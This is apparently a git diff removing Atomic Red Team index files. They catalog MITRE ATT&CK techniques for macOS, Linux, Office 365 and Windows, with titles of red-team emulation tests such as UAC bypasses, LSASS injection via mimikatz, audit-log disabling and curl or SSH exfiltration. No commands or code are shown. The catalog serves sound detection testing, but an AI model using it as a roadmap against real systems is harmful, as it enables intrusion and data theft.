- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
atomics/Indexes/Indexes-Markdown/office-365-index.md
-124
View File
@@ -1,124 +0,0 @@
# Office 365 Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.008 Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
- Atomic Test #1: Office365 - Email Forwarding [office-365]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# exfiltration
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
-1843
View File
@@ -1,1843 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.011 Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 execute VBscript command using Ordinal number [windows]
- Atomic Test #4: Rundll32 advpack.dll Execution [windows]
- Atomic Test #5: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #6: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #7: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #8: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #9: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #10: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #11: Rundll32 with Ordinal Value [windows]
- Atomic Test #12: Rundll32 with Control_RunDLL [windows]
- Atomic Test #13: Rundll32 with desk.cpl [windows]
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- Atomic Test #4: Create and Hide a Service with sc.exe [windows]
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1218.004 Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #1: Windows Disable LSA Protection [windows]
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #1: Copy and Delete Mailbox Data on Windows [windows]
- Atomic Test #4: Copy and Modify Mailbox Data on Windows [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
